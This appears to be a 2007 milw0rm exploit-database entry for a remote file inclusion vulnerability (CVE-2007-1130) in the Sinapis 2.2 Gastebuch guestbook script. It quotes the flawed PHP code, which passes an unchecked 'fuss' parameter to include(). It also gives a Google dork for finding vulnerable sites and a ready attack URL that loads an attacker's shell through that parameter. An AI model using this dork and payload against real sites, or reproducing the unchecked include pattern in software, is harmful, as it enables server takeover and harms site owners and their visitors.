Sinapis 2.2 Gastebuch - 'sinagb.php?fuss' Remote File Inclusion



EKU-ID: 11344 CVE: OSVDB-37007;CVE-2007-1130 OSVDB-ID:
Author: kezzap66345 Published: 2007-02-23 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


Sinapis 2.2 Gastebuch

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=gb&title=Sinapis%20Gästebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="inurl:sinagb.php"
*****************
ERROR:

if($fuss == ""){
echo "</body></html>";}
else{
include($fuss);}       <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinagb.php?fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

# milw0rm.com [2007-02-23]